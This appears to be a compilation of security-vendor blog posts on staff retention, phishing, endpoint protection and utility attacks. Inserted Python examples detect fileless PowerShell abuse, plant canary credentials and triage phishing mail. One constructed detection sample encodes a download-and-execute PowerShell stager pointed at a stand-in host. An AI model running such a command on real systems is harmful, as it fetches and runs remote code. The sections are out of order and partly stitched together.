In an article posted on the organization’s website, the Center for Strategic and International Studies (csis.org) reported that, as of January 2019, the United States had 314,000 more open cybersecurity positions than trained professionals available to fill them, an increase of over 50% since 2015. Globally, the shortfall is expected to grow to 1.8 million by 2022, and that number applies only to cybersecurity positions. The shortage of trained cyber professionals is affecting every area of information technology specialization.
Because it is already difficult to find and hire technology pros now and will become even more difficult over time, organizations and managers must focus on retaining the talent they currently have on staff. There are some common reasons given by IT personnel when asked why they are seeking new employment. There are also some common-sense measures managers and their employers can take to address them.
Too much overtime
Personnel shortages, combined with off-hours work associated with tasks like system updates, patching, dealing with threats or incidents, and testing can make for long days for your IT staff. Add to that the unplanned projects that often force IT to move its own projects to the back burner, and the frustration is compounded.
Currently, one of the most popular ways to deal with this issue is to contract with third-party service providers to offload some of the work. If you choose the right provider, you can save a significant amount of time and allow your employees to have the downtime they need to recharge. We have found that this is one of the biggest benefits of our managed security services.
There may also be some non-technical tasks currently being handled by the IT department that could be either shared with, or assigned to, other departments within the organization. Cross-training others to handle these could lighten the load significantly. An example might be physical access security. Because applications used to manage these controls reside on servers, IT often ends up being responsible for access management tasks that could be offloaded to facilities, security, or engineering personnel.
Cross-training within your technology team is also a good idea. Not only does it broaden the skillsets of your staffers, but it also helps ensure that tasks are completed and projects don’t fall behind because only one overworked employee possesses the knowledge and skills needed to handle them.
Limited or no advancement opportunities
No one wants to be stuck in a dead-end job, but, with personnel shortages, promoting someone and back-filling their position could prove to be difficult. Consider, however, that you will need to fill the position anyway when a current employee, frustrated by a lack of advancement opportunities, finds a new job elsewhere. One way of addressing this is to improve communication with your staff. Until you know what their goals are, you can’t help your employees achieve them. Just knowing that you’re interested may give your staffers some hope that they aren’t stuck in a rut, but you’ll need to follow through with action.
Talk with your people one-on-one and come up with ways for each individual to further develop their skillsets. Perhaps they have ideas that would streamline and improve operations. Find ways to allow them to implement those ideas. This may increase their chances for promotion when opportunities arise.
Let upper management and human resources personnel know what you’re doing and why. Find out what new opportunities may be on the horizon and how you can help your people to position themselves for advancement.
Google implemented what is known as the 80/20 policy: employees devote 80% of their time to the tasks required to meet their responsibilities and spend the remaining 20% working on projects that further develop their skills and make them more valuable to the organization. The more valuable the employee, the less likely upper management will be to let them get away.
Increase opportunities for training
Another way to help your employees prepare for promotions, sharpen their skills, and learn of new industry developments is to ensure that they have access to training. Keep in mind that many training providers offer online coursework that can be completed anytime and from any device with an Internet connection. Some, like the SANS Institute (SANS.org), offer free courses and exercises so that, even if training isn’t in the budget, it’s still accessible. Additionally, when new hardware and software is procured, training is often part of the deal and can be beneficial to both the organization and its employees.
In addition to an overabundance of overtime, a lack of advancement, and the unavailability of training, tech workers often cite issues with their direct managers as their reason for seeking new employment. How you, as a manager, interact with your staffers may have more to do with whether they seek employment elsewhere than any other factor. If they know you’re interested in them and want to help them achieve their goals and be successful, they are more apt to stick around even if advancement opportunities are currently limited or unavailable.
Get buy-in from upper management and HR. Maintain an open-door policy. Frequently speak with them one-on-one. If you say you’ll do something, do it. Be their advocate and be creative. Find ways to give them access to the resources they need and the time required to take advantage of them.
If you are an IT manager looking for information to present to your bosses to emphasize the need for an effective cybersecurity training program, new data from a 2021 research study might be just what you need.
Security services provider Thycotic published the survey results in a report entitled “Balancing Risk, Productivity, and Security.” The firm partnered with SAPIO Research to conduct the survey of 8,041 workers in 15 countries. The results are surprising, if not shocking, and offer a number of reasons for concern.
What researchers learned
The survey revealed that, although more than 85% of those polled said they felt some responsibility for ensuring that they don’t do things that could expose their organizations to increased risk, 51% of respondents believed their IT departments should be completely responsible for preventing their employers from falling victim to cyber attacks. Many in the IT business have encountered and been a bit irritated by this mindset before, but most probably hadn’t imagined that this number would be so high.
Nearly half of respondents (45%) believed cyber attacks posed little or no risk to their organizations. Perhaps that’s why, according to the Thycotic report, 79% of survey participants admitted to having engaged in at least one risky activity within the previous year. The activities included sharing their login credentials with coworkers, using personal devices at work without authorization, using the same password for multiple accounts, and even permitting their company devices to be used by family members.
Why is this happening, and what explains the lack of concern about cybersecurity? Per the survey, a shockingly high 56% of respondents said they had received no cybersecurity training within the previous year. Evidently, they simply don’t know they should be concerned. They’re not being told that their behaviors can create significant risks for their employers or that the IT department can’t stop every attack. Considering that phishing is, and has been for some time, the most utilized attack vector (see Verizon’s Data Breach Investigations Report at verizon.com/business/resources/reports/dbir/) and that the best defense against this and other social engineering attacks is user education, this lack of training is truly alarming.
Recent events increase the threat
With so many working remotely since the pandemic began in 2020, it is critical that employees be given additional training regarding risks associated with remote connectivity, using personal devices to connect to company resources, allowing family members to use company-owned devices, and maintaining the security of their home networks. Effectively, allowing employees to work remotely has transformed what had been local area networks into wide area networks, with home networks becoming part of organizational infrastructure. This significantly expands the attack surface.
Build an effective training program
Effective cybersecurity training programs are ongoing, are continuously updated, and are periodically evaluated to measure their effectiveness and identify areas in need of improvement. They require the active participation of trainees. Merely sending out a newsletter and assuming employees are reading it, understanding the material, and retaining the information isn’t sufficient. They need to be engaged. Requiring them to participate in tabletop exercises and perhaps some classroom or online courses allows them to ask questions. Quizzes ensure that they are paying attention.
Introducing stress into the mix improves retention. An example would be simulated phishing campaigns wherein employees receive suspicious emails and don’t know whether they are real threats or fakes. Offering training employees can benefit from in their personal lives as well as at work gives them more incentive to learn and retain the information.
Monitor Employees’ Endpoints
With a service like Cybriant MDR, you can monitor and protect all endpoints on a 24/7 basis. The service includes a lightweight agent installed on every endpoint you want to protect, and our team watches those endpoints for unusual activity. Using AI technology, we can detect and prevent attacks before they fully execute. When a threat is detected, we contain and mitigate it, whatever the mode of attack.
Endpoint security technologies are vitally important in today’s world of remote work. Hackers are finding new vulnerabilities to attack constantly. Here are 5 endpoint security technologies to defend against cyber threats.
Increasingly sophisticated threats target the endpoint devices that are connected to every organization’s network. These endpoint devices include workstations, employee laptops, and IoT devices. Modern cyber threats can easily evade signature-based technologies that rely on databases of known malware to detect cyber attacks.
This article highlights five advanced endpoint security technologies that organizations need if they want better protection in the current threat landscape.
#1. AI Endpoint Security
Artificial intelligence (AI) has a powerful role to play in advancing the protection of endpoint security. Machine learning algorithms that autonomously improve over time can be used to detect contextual anomalies on endpoint devices that indicate in-progress cyber attacks. These contextual anomalies include unexpected application behavior and logins from new locations or IP addresses.
Data science professionals can train machine learning algorithms using huge datasets of known threats. Additional security-related information can train the algorithms to understand normal patterns of usage across many different endpoint devices. Deployed in endpoint protection solutions, AI can help detect new variants of known malware for which no signature even exists in any database. Signature-based anti-malware technology detects 99 percent of known threats, while AI can help address the most dangerous 1 percent of sophisticated emerging threats.
#2. Application Isolation
An increasingly problematic attack vector that threatens endpoint devices is known as a fileless attack. In a fileless attack, the perpetrator uses applications and tools that are already installed on a target endpoint device. It’s harder to detect a fileless attack because it doesn’t require the installation of any new code or the execution of a new file on the endpoint.
Fileless attacks often exploit macros in office applications or scripting languages such as PowerShell. Endpoint solutions with application isolation take a zero-trust approach to application behavior. In practice, application isolation establishes a whitelist of approved applications that can run on an endpoint and sets rules for what each application can do.
For applications that aren’t trusted by default, restrictive controls enable endpoint devices to run the application with limited ability to interact with the operating system or with other trusted applications. The benefit of application isolation is that you dramatically shrink down the attack surface with more granular control over what applications can do on your endpoints.
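The fileless pattern described above (an Office application launching PowerShell with an encoded, hidden command line) is what an endpoint detection rule actually has to look for. The following is an added example, not Cybriant’s code or any vendor’s detection logic: it scores constructed, simplified process-creation events of the form `parent_image|image|command_line`. The field layout, the indicator list and the scoring weights are assumptions for illustration; the sample events are constructed, and the base64 blob is generated in the block from a harmless stager string.

```python
"""Added example (not Cybriant's code): score process-creation events for
the fileless pattern described above, an Office application spawning a
script host with an encoded or hidden PowerShell command line.

Each event is a constructed, simplified Sysmon-style line:
    parent_image|image|command_line
The field layout, the indicator list and the scoring weights are
assumptions for illustration, not a vendor's detection logic."""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# -EncodedCommand (and its short forms) followed by a base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

# Command-line indicators common to living-off-the-land PowerShell abuse.
INDICATORS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "no profile"),
    (re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"downloadstring|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I), "download/eval"),
]

def decode_blob(blob):
    """PowerShell's -EncodedCommand is base64 over UTF-16LE text; None if it is not."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(line):
    """Return (score, reasons, decoded_payload) for one event line."""
    parent, image, cmdline = (f.strip() for f in line.split("|", 2))
    parent_name = parent.rsplit("\\", 1)[-1].lower()
    image_name = image.rsplit("\\", 1)[-1].lower()
    score, reasons, decoded = 0, [], None
    if parent_name in OFFICE_APPS and image_name in SCRIPT_HOSTS:
        score += 5
        reasons.append(f"{parent_name} spawned {image_name}")
    m = ENC_RE.search(cmdline)
    if m:
        score += 2
        reasons.append("encoded command")
        decoded = decode_blob(m.group(1))
    # Scan the visible command line with the blob redacted, so base64 noise
    # cannot accidentally match a keyword, then scan the decoded payload.
    visible = ENC_RE.sub("-EncodedCommand <blob>", cmdline)
    for prefix, text in (("", visible), ("decoded: ", decoded or "")):
        for pattern, label in INDICATORS:
            if pattern.search(text):
                score += 2
                reasons.append(prefix + label)
    return score, reasons, decoded

def triage(lines, threshold=5):
    """Return events scoring at or above the threshold, highest first."""
    hits = []
    for line in lines:
        score, reasons, decoded = analyze_event(line)
        if score >= threshold:
            hits.append({"line": line, "score": score, "reasons": reasons, "decoded": decoded})
    return sorted(hits, key=lambda h: -h["score"])

# Constructed sample: a benign event, a macro-launched stager, and an
# admin script that legitimately bypasses the execution policy.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    r"C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe notes.txt",
    r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|"
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    f"powershell.exe -NoP -W Hidden -Enc {ENCODED}",
    r"C:\Windows\System32\svchost.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["score"], hit["reasons"])
        print("   decoded:", hit["decoded"])
```

Only the Word-spawned PowerShell crosses the threshold; the administrator’s `-ExecutionPolicy Bypass` script scores low on its own, which is the point of weighting the parent/child relationship more heavily than any single switch.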
#3. Endpoint Detection and Response
While it’s better to prevent cyber attacks before they can infiltrate your network, it’s prudent to operate under the assumption that one of your endpoints will be breached at some point. When operating under this assumption, you can put technologies and workflows in place that quickly contain a breach. Endpoint detection and response leverages threat intelligence to detect threats and remediation strategies to contain any damage.
The response aspect of this type of technology typically combines the following automated strategies:
Quarantining any endpoint device on which a threat has been detected and verified.
Deleting the malicious files and their artifacts from any compromised endpoint.
Blacklisting the IP addresses or specific URLs from which the threat originated.
#5. Patch Management
A shocking number of high-profile cybersecurity incidents begin with the exploitation of a software vulnerability for which a security patch already exists. The problem is that many organizations use inefficient manual processes to push software updates to endpoints. Sometimes it’s left to the user of the endpoint to install the update, which is a recipe for disaster.
Smart patch management in the modern threat landscape should automatically apply the latest security updates to different endpoints. The patch management solution should be mandated by the company so that all endpoint devices are covered, which includes personal laptops that employees use to connect to cloud-based business applications.
#4. Deception Technology
Deception is an interesting area of cybersecurity that is focused on setting traps for threat actors to reveal their attack techniques or to simply attack phony parts of the network on which no resources exist. A good example is to set up a fake endpoint, which appears to attackers as a host on the network. As soon as you see activity on the fake endpoint, you know an attacker is trying to breach your network, and you can view their activities to get insight into any potential attack vectors they’re trying to deploy.
Another deception tactic is to create fake files with attractive names, such as files with the word “confidential” in the title. Deceiving attackers into revealing their techniques is a good way to get visibility into the real-world threat landscape. Several proprietary security solutions allow you to deploy various types of bait throughout the endpoint devices on your network.
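The bait files described above are most useful when the bait can be traced back to where it was planted. The following is an added example, not from the original post or any product: it generates a per-endpoint decoy credential for “confidential” files and then scans authentication log lines for any attempt to use one, which tells you which endpoint’s decoy was read and from where. Host names, the decoy file layout, the planting key, the log format and the sample log lines are all constructed for illustration.

```python
"""Added example (not from the original post): per-endpoint bait
credentials in 'confidential' decoy files, and a detector that maps any
attempt to use a bait credential back to the endpoint it was planted on.
Host names, the decoy file layout, the planting key, the log format and
the sample authentication log lines are all constructed for illustration."""
import hashlib
import hmac
import re
import secrets

DECOY_FILENAMES = ["passwords-CONFIDENTIAL.txt", "vpn_access_confidential.txt"]

def canary_username(host, planting_key):
    """Unguessable decoy account name bound to one host; only the defender
    holding planting_key can recompute it."""
    tag = hmac.new(planting_key, host.encode(), hashlib.sha256).hexdigest()[:8]
    return f"svc_backup_{tag}"

def plant_decoys(hosts, planting_key):
    """Build decoy file contents for each host plus the username -> host
    lookup table the detector needs."""
    files, lookup = {}, {}
    for host in hosts:
        user = canary_username(host, planting_key)
        password = secrets.token_urlsafe(12)  # bait only; valid on no real system
        lookup[user] = host
        content = f"# backup service account, do not share\nusername={user}\npassword={password}\n"
        files[host] = {name: content for name in DECOY_FILENAMES}
    return files, lookup

# Constructed authentication-log format: "auth <accept|reject> user=<u> src=<ip>".
AUTH_LINE = re.compile(r"auth (?P<result>accept|reject) user=(?P<user>\S+) src=(?P<src>\S+)")

def detect_canary_use(log_lines, lookup):
    """A login attempt with a bait username, successful or not, means the
    decoy file on that host was read: alert with the host and the source."""
    alerts = []
    for line in log_lines:
        m = AUTH_LINE.search(line)
        if m and m.group("user") in lookup:
            alerts.append({"planted_on": lookup[m.group("user")],
                           "attempt_from": m.group("src"),
                           "result": m.group("result")})
    return alerts

PLANTING_KEY = b"constructed-demo-key-not-for-production"
HOSTS = ["ws-finance-07", "ws-hr-03", "srv-files-01"]
DECOY_FILES, LOOKUP = plant_decoys(HOSTS, PLANTING_KEY)

# Constructed log: two normal logins and one attempt with the bait planted on ws-finance-07.
SAMPLE_LOG = [
    "2021-06-01T02:11:09Z vpn auth accept user=jsmith src=203.0.113.7",
    "2021-06-01T02:14:31Z vpn auth reject user="
    + canary_username("ws-finance-07", PLANTING_KEY) + " src=198.51.100.23",
    "2021-06-01T02:15:02Z vpn auth accept user=mlee src=203.0.113.9",
]

if __name__ == "__main__":
    for alert in detect_canary_use(SAMPLE_LOG, LOOKUP):
        print(alert)
```

Because the bait password is valid nowhere, even a rejected login is a high-confidence alert: no legitimate user has any reason to type that username.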
Modern endpoint security must take a layered approach if organizations want adequate defense in the current threat landscape. Ideally, all of these endpoint security technologies should be combined into a single solution for ease of deployment. Many of the largest security vendors have modern endpoint protection solutions with all of these features.
While hackers are getting smarter and their attacks more complex, it’s vitally important to lay the groundwork to avoid becoming a phishing victim. Here are three bulletproof ways to avoid being a phishing victim.
We’ve talked about it before and it remains true. Phishing is the #1 threat to your users regarding the protection of your organization’s data.
In a 2017 study conducted with UC Berkeley, Google researchers identified 788,000 potential victims of off-the-shelf keyloggers, 12.4 million potential victims of phishing kits, and 1.9 billion usernames and passwords exposed via data breaches and traded on black market forums. Using this dataset, they explored to what degree the stolen passwords, which originate from thousands of online services, enable an attacker to obtain a victim’s valid email credentials, and thus complete control of their online identity due to transitive trust.
Google’s analysis showed that less than 7 percent of the passwords exposed in third-party data breaches were still valid for the victim’s Google account, a consequence of password reuse. Furthermore, the company’s data suggests that credential leaks are becoming less likely to result in account takeover as password reuse rates decline.
Phishing: The #1 threat to your users
On the other hand, nearly a quarter of the passwords stolen via phishing attacks were valid, and Google believes phishing victims are 460 times more likely to have their accounts hacked compared to random users. As for keyloggers, nearly 12 percent of the compromised passwords were valid, and falling victim to such malware increases the chances of account takeovers 38 times.
How Can Organizations Help Their Users Avoid Becoming Phishing Victims?
As an organization, there are many tools and services available to help detect and remediate any cyber threats that enter your network. Cybriant has put the basic services together in one all-in-one service called CybriantXDR. It’s a comprehensive threat detection and remediation service that gives you greater visibility across your organization. Find out more here: https://cybriant.com/cybriant-xdr/.
While your organization should do everything possible to prevent data breaches, there are several ways to help your users. Here are three bulletproof ways to help your users avoid being phishing victims.
1. Zero Trust Mind Set
When an unexpected email arrives, train your employees to apply a zero-trust mindset: do not click any link in it, no matter what. Hover over each link to see where it actually points and compare that destination with the text displayed. Look at the sender’s actual address, not just the display name; this is an easy way to confirm the message is coming from the right person and not a look-alike.
If they are still unsure, have a process in place for forwarding the email to your IT or security team so it can be confirmed.
Andrew was able to examine the email and explore the URL in a sandbox so no harm was done. It was a very authentic-looking email that made it past several of the tools he had in place to block phishing emails as well. Luckily, he was able to avoid becoming a phishing victim and help others learn how to do the same.
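The two manual checks above, “hover over the link” and “look at the sender”, can be automated for messages employees forward to the security team. The following is an added example, not from the original post: it parses a forwarded message and reports a display name that carries a different address, a Reply-To or Return-Path domain that does not match the From domain, link text that names one site while the href goes to another, and plain-http links. Both sample messages are constructed, and the domains are reserved example names.

```python
"""Added example (not from the original post): automate the two manual
checks above, 'hover over the link' and 'look at the sender', for a
message an employee has forwarded to the security team. Both messages
below are constructed; the domains are reserved example names."""
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

class LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs from an HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

# Visible link text that itself looks like a URL or hostname.
URL_LIKE = re.compile(r"^(?:https?://)?([\w.-]+\.[a-z]{2,})(?:[/?#]\S*)?$", re.I)

def registrable(host):
    """Crude 'last two labels' reduction (mail.corp.example -> corp.example)."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])

def sender_parts(header_value):
    """(display name, address, address domain) for a From/Reply-To style header."""
    name, addr = parseaddr(header_value or "")
    addr = addr.lower()
    domain = addr.rsplit("@", 1)[-1] if "@" in addr else ""
    return name, addr, domain

def html_body(msg):
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            raw = part.get_payload(decode=True)
            return raw.decode(part.get_content_charset() or "utf-8", "replace")
    return ""

def triage_message(raw_message):
    """Return a list of (finding_code, detail) for the forwarded message."""
    msg = message_from_string(raw_message)
    findings = []
    name, from_addr, from_dom = sender_parts(msg.get("From"))
    # 'Look at the sender': a display name that shows a different address.
    if "@" in name and name.lower() != from_addr:
        findings.append(("display_name_spoof", f"display name shows {name!r}, actual address is {from_addr}"))
    for header, code in (("Reply-To", "reply_to_mismatch"), ("Return-Path", "return_path_mismatch")):
        _, _, dom = sender_parts(msg.get(header))
        if dom and registrable(dom) != registrable(from_dom):
            findings.append((code, f"{header} domain {dom} differs from From domain {from_dom}"))
    parser = LinkExtractor()
    parser.feed(html_body(msg))
    for href, text in parser.links:
        target = urlparse(href)
        host = target.hostname or ""
        if target.scheme == "http":
            findings.append(("http_link", f"unencrypted link to {host}"))
        # 'Hover over the link': the visible text names one site, the href another.
        m = URL_LIKE.match(text)
        if m and registrable(m.group(1)) != registrable(host):
            findings.append(("link_text_mismatch", f"text shows {m.group(1)}, link goes to {host}"))
    return findings

# Constructed phishing message: spoofed display name, foreign Reply-To, look-alike link.
PHISHING_MESSAGE = """\
From: "IT Helpdesk <helpdesk@corp.example>" <noreply@mail-notify.example.net>
Reply-To: helpdesk-reply@replies.example.org
To: employee@corp.example
Subject: Action required: your mailbox is almost full
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Your mailbox has reached 98% of its quota. Please
<a href="http://corp-example.login-portal.example.net/verify">https://mail.corp.example/quota</a>
to keep receiving mail.</p>
<p><a href="https://mail-notify.example.net/unsubscribe">Unsubscribe</a></p>
</body></html>
"""

# Constructed legitimate message for comparison.
BENIGN_MESSAGE = """\
From: Payroll <payroll@corp.example>
To: employee@corp.example
Subject: Your pay statement is available
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Your statement is ready:
<a href="https://hr.corp.example/statements">hr.corp.example</a></p></body></html>
"""

if __name__ == "__main__":
    for code, detail in triage_message(PHISHING_MESSAGE):
        print(code, "-", detail)
    print("benign findings:", triage_message(BENIGN_MESSAGE))
```

The link-text check only fires when the visible text itself looks like a URL or hostname; “click here” style text is left to the reader, which keeps the tool from flagging every ordinary newsletter.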
2. Multi-Factor Authentication
While this is highly recommended for remote workers, MFA (Multi-Factor Authentication) is important no matter where you work.
Multi-factor authentication adds an additional layer of protection to your IT security environment on top of a strong password policy. With multi-factor authentication, employees can only gain access to systems if they give two or more pieces of identification while signing in. The most practical use of multi-factor authentication is to require a standard username and password combination in addition to a dynamic one-time passcode that only remains valid for one login session.
3. Protect All Endpoints
While all company-owned devices like laptops and cell phones should have the highest level of protection that has been specified by your organization-wide security strategy, many employees are accessing company data through personally-owned devices.
These personally-owned devices should be protected by antivirus or something similar. At Cybriant, we let everyone know that certain cyber threats can make it through traditional antivirus. It may be necessary to block access to company data on personal devices and only allow protected devices to be able to connect to certain applications.
Here are some of the threats that can make it through traditional antivirus:
Advanced Threats. Legacy antivirus depends on prior knowledge of a threat to detect it. Adversaries have access to nation-state-grade tooling, which means new threats appear daily. AI and machine learning give us the ability to detect and validate suspicious activity.
Polymorphic Malware. Attackers can easily defeat signature-based antivirus tools that rely on checking a file’s hash against a known hash database.
Malicious Documents. Sometimes a maliciously crafted document is used to exploit vulnerabilities in the application that opens it to achieve code execution, and legacy AV cannot detect these by reputation alone.
Fileless Malware. Attackers have realized that traditional AV solutions have a gaping blindspot: malicious processes can be executed in memory without dropping telltale files for AV scanners to find.
Encrypted Traffic. Malicious actors can hide their activities from inspection by ensuring that traffic between the victim and attackers’ command-and-control (C2) server is protected by end-to-end encryption.
Our team of security experts will help stop advanced threats at the endpoint with Cybriant MDR. We utilize AI-based next-gen antivirus that will help you:
PREVENT: Our security analysts monitor and record all the events that occur on your endpoints. Our team focuses on relevant threats that attempt data exfiltration or modification. When a file attempts to launch such a suspicious process, an alert is triggered and the attack is halted in real time.
DETECT: When a credible threat is detected, our system will retrieve the process history and our team will analyze the chain of events in real-time and determine the validity of the threat. You’ll receive the alerts when threats are detected along with advice and insight from our cybersecurity team to help you mitigate and respond to the threat.
REMEDIATE: Once identified, the malicious activity is immediately stopped, and our team guides you through remediation. The remediation process provides detailed insight into the threat. You’ll be able to help your organization reduce its attack surface by learning how you were compromised.
Consider Cybriant MDR to help you detect the threats that antivirus alone will miss. Learn more here: cybriant.com/mdr.
Cyberattacks On Utilities. Here are the top two things Water Utilities need to do right now to secure our drinking water supply from cyberattacks.
Nothing seems to be safe from cyberattacks anymore. In 2021 so far, Colonial Pipeline, operator of a major fuel pipeline, was hit by ransomware, resulting in fuel shortages across the Southeast, and Brenntag, a chemical distribution company, was compromised, with the attackers demanding $7.5 million.
The U.S. Department of Energy is working to implement a national cybersecurity strategy and has so far focused its efforts on the nation’s transmission and generation assets, but utility distribution systems are “increasingly at risk” from intrusion and disruption, according to a report from the Government Accountability Office.
Cyberattacks On Utilities: What about our Water Supply?
On April 1, 2021, federal prosecutors announced that they had indicted Wyatt A. Travnichek for hacking into the computer systems of the Post Rock Rural Water District, where he was once employed, and shutting down the cleaning and disinfection processes. And in February of the same year, a yet-to-be-identified intruder hacked into the water treatment plant at Oldsmar, Florida, and briefly increased the amount of lye, a chemical used to regulate acidity in drinking water, from the normal 100 parts per million to a toxic 11,100 ppm.
These and other types of cyberattacks on utilities are likely to become more and more common in the future. So, what are the top two things water utility companies can do to secure their operations?
Make It Clear That Cybersecurity Is Everyone’s Responsibility
In many water utility firms, there is a tendency to assume that cybersecurity is the sole responsibility of the IT department. However, modern computer hacks are not always technical; malicious actors sometimes use a range of social and psychological techniques to trick employees into making security mistakes. For this reason, cybersecurity should be an integral part of the overall workplace culture at all levels. Utilities should make it clear that cybersecurity is everyone’s responsibility, from the cleaner to the chief executive. They should take a ‘verify then trust’ approach: every email, file, and approach by a third party should be viewed as a potential threat until proven otherwise.
Reconfigure Remote Access
It is instructive to note that the attacks described in the previous section were possible, in large part, because the water utilities in question had enabled remote access to their information technology (IT) and operational technology (OT) systems. To prevent such attacks, utilities need to seriously revisit their remote access policies.
Remote access should be disabled as a matter of routine, advises Jake Brodsky, an industrial control systems (ICS) security engineer with over 30 years of experience in the water industry. Where such access is necessary, as is occasionally the case, the feature should be configured in such a way that it has to be manually enabled by someone who is physically present at the facility. For added security, utilities should set access to time out after a brief duration, utilize multi-factor authentication for remote users, and avoid using one account for multiple employees.
These are the two top things most water utility companies need to do to keep their operations – and our water supply – safe from hackers. What else can these companies do to improve security? Tackle the basics, such as performing asset inventories and assessing risk, as well as the more advanced stuff, such as planning in advance for contingencies. Finally, utilities need to share information with each other and industry stakeholders; there is strength in numbers.
We have found that many organizations don’t consider themselves a target for hackers. What we have learned is that it’s not IF but WHEN you will be attacked. CybriantXDR was created with you in mind. This service covers all the basics for a complete cybersecurity strategy including the right people, processes, and technology.
There are multiple advantages to outsourced network monitoring. No matter your organization’s size, it’s vitally important to protect the data that can be accessed inside and outside of the perimeter.
Ideally, the focus of business management should be its bottom line. The more time businesses spend monitoring their own network infrastructures, the less time they have for managing employees, revamping policies, and researching profit gain strategies.
Aside from time, there is a stress factor that must be considered–business owners or managers who take on the task of monitoring their own network will generally be more stressed, although it’s an avoidable problem. When a business’s income flow depends on the integrity of its computer network, then it can count on dividing its time and energy between profit gain and maintenance of the computers.
Outsourced proactive monitoring is a trend utilized by several businesses to mitigate this problem. Besides saving time and stress, there are other important facets of computer networks that benefit from the outsourcing of proactive monitoring.
Quality Of Service
This refers to the status of network data flow–whether data is transmitting efficiently or not. Optimizing the flow of network data can add up to an abundance of saved time.
Assuming there is already an efficient setup of the physical network, the software built into the network routers, switches, and computers must be configured to allow for the optimization of apps and programs most relevant to a company’s activities.
Fluctuations of data flow within a company’s internal network can be detected and confidently compensated for remotely by trained technicians.
Monitoring Malicious Activity
Businesses using computer networks cannot get around the necessity of effective security. With the monetization of stolen data on the dark web and the glamour that the film industry and hacker culture attach to successfully hacking computer systems, it’s more important than ever to mitigate risk.
Mitigating security risks inherent in computers and networks is not only about installing antivirus software and setting up push alerts, however–it also includes the proper configuration of routers and switches and can also involve a revamp of the actual physical network setup.
Whatever the case, once the fundamental security measures are configured, remote monitoring of certain metrics can begin and businesses can rest assured knowing they are under professional care. Monitoring in a proactive sense can also include memos pushed by the professionals so that employees are familiar with trending or up-and-coming security threats.
Controlled Software Updates
Updating software installed on computer systems goes hand-in-hand with security and quality of service. It is also a task that can be done remotely and should be done proactively. Software is revamped continually by its manufacturers after glitches are found in the original releases.
Security loopholes are also discovered which the manufacturer will create patches for. These software updates are made available on manufacturer websites or can be configured for automated installation within the programs they are made for.
However, timing the installation of these updates is critical. It generally requires much of the bandwidth (available data speed) of the company’s internet and internal network. The installation should be prioritized in accordance with the interests of the company while weighing the risks of installing vs not installing. In general, it is a good idea to install updates, but updates have been known to bring entire networks down and out of service due to unforeseen glitches in them.
Perhaps manufacturers did not thoroughly test the updates, or another technical anomaly occurred. Whatever the case, service technicians trained in proactive monitoring will take on the task of weighing the risks and installing in a manner where there is minimal if any negative consequence.
The benefits of outsourced management of computers and networks are bountiful. Not only does it close the knowledge gap so that businesses know they are receiving proper care, but it lowers business management stress to a tolerable level. Furthermore, when data residing on business computers is mission-critical, managed IT service providers even have methods and resources for preservation thereof. There is much to be gained.
The number one way to mitigate the damage from any attack on your environment is to prevent it from happening in the first place.
It’s vital to protect your organization from all points of entry and ensure your organization has visibility of all the points of entry that are being accessed by authorized personnel.
CybriantXDR combines the latest technology utilizing machine learning and artificial intelligence with experienced oversight to identify and terminate malicious software before it can execute.